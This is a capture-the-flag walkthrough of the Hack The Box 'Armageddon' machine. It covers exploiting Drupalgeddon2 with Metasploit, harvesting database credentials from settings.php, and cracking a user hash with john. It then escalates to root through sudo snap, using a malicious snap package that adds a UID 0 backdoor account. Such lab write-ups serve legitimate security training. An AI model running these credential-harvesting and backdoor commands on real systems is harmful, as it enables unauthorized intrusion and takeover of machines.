# Armageddon ## Nmap ``` nmap 10.10.10.233 -p- -sS -sV PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4 (protocol 2.0) 80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16) ``` Port 80 hosts a web server which is visually identifiable as a Drupal instance. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FUkeVYojbJgXUG2EN0av7%2Fimage.png?alt=media\&token=f18660f3-9666-41cd-b749-323066e9be75) Standard enumeration did not show any interest information. From here drupwn was utilized to identify the exact version of Drupal installed. **Github:** **Install** ``` git clone https://github.com/immunIT/drupwn.git cd drupwn python3 setup.py install ``` **Usage** ``` drupwn --mode enum --target http://10.10.10.233 ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FGt3AQaHRmcZH5dw4kmkR%2Fimage.png?alt=media\&token=bab2173b-586b-4319-af68-943141d95e03) `Searchsploit` \*\*\*\* shows that this version of Drupal is vulnerable to "Drupalgeddon". ```bash searchsploit -w "drupal 7.56" ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F0hLrKIwM6MytHywpHtTX%2Fimage.png?alt=media\&token=c6f49523-90b7-4cad-a9c6-87b357591057) Metasploit has a module for drupalgeddon2. Once the corrects options were set the exploit was executed. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fk69tkyPhB3GYtW5IjxUp%2Fimage.png?alt=media\&token=3b051647-ec7c-4475-9e52-7ba5bd6d1d7a) Where we receive a meterpreter shell. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FUPZV3xMnE637kE8i7vAW%2Fimage.png?alt=media\&token=6f9c2e94-7de4-4bc7-b408-60652d887dc2) Now with a shell, we find we are working as the *apache* user. As Drupal is installed we perform some basic enumeration steps to look for `MySQL` usernames and passwords. The command below can be used to scour the `settings.php` file for this information. ```bash find / -name settings.php -exec grep "drupal_hash_salt\|'database'\|'username'\|'password'\|'host'\|'port'\|'driver'\|'prefix'" {} \; 2>/dev/null ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FlDHjlux99xTprRjtRTvg%2Fimage.png?alt=media\&token=2a2d460f-ac31-4e14-8f7e-8ba07e8b812e) Finding the above credentials we run a single command against `MySQL` to find a hash for a user on the machine. ```bash mysql -u drupaluser --password='CQHEy@9M*m23gBVj' -e 'use drupal; select * from users' ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FluGfp26xsQWRjTKSZOmK%2Fimage.png?alt=media\&token=552445a0-1917-4b36-8b27-568f2fbcd4c7) This hash is then cracked with `john` to reveal the credentials: `brucetherealadmin:boobo`. ```bash sudo john --wordlist=/usr/share/wordlists/rockyou.txt ~/Desktop/hash.txt ``` We can now login over `SSH` as the user *brucetherealadmin*. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fu36H5pPTcQRlxytJAPo5%2Fimage.png?alt=media\&token=cb6fc311-c088-47ea-8702-ff0b873d4423) From here linpeas.sh was utilized to help with Privilege Escalation identification. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FFMTerqDfqW4ROGHRa2ov%2Fimage.png?alt=media\&token=a6a63951-d1af-4cc3-a9e0-8c523111c84a) We find the current user can run the `/usr/bin/snap` binary as the `root` user without specifying a password. **GTFOBins:** ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FD21c2uhGeqyJSFSrQhsb%2Fimage.png?alt=media\&token=971aa90f-a98c-4316-873e-aa7e6f4097ff) From the above GTFOBins link we see that a malicious package can be crafted and used to execute the package in the context of the `root` user. The blog post linked below shows some ways in which this can be done. **Blog:** We can also use the below Snap\_Generator to help us easily craft the required `snap` packages. **Github:** **Install fpm (Required)** ``` sudo gem install fpm ``` **Download and prepare Snap\_Generator** ``` wget https://raw.githubusercontent.com/0xAsh/Snap_Generator/main/snap_generator.sh && chmod +x snap_generator.sh ``` After running the above command we need to then issue a command to the snap\_generator.sh script to use in our package. In this instance we will add a new `root` user to the target system. ``` /usr/sbin/useradd -p $(openssl passwd -1 Password123) -u 0 -o -s /bin/bash -m owned ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FXvwp4cQTR4xxF2aW8OTy%2Fimage.png?alt=media\&token=cb0ef3de-c27d-4bdb-85da-eb176c03130a) Upload the snap package to the target system. ``` sudo -u root /usr/bin/snap install /home/brucetherealadmin/owned_1.0_all.snap --dangerous --devmode ``` After completion check for existence of the new user. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fj1LwjxsUzS5AuQRqO1aA%2Fimage.png?alt=media\&token=86edd6d3-7abd-4b93-b65d-aa2cf2437f06) Once confirmed, switch over to the new user. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FXmAYoCVq1Ko37CQhnFWP%2Fimage.png?alt=media\&token=7e0f0193-e17e-4377-a122-1c8717b4fd90)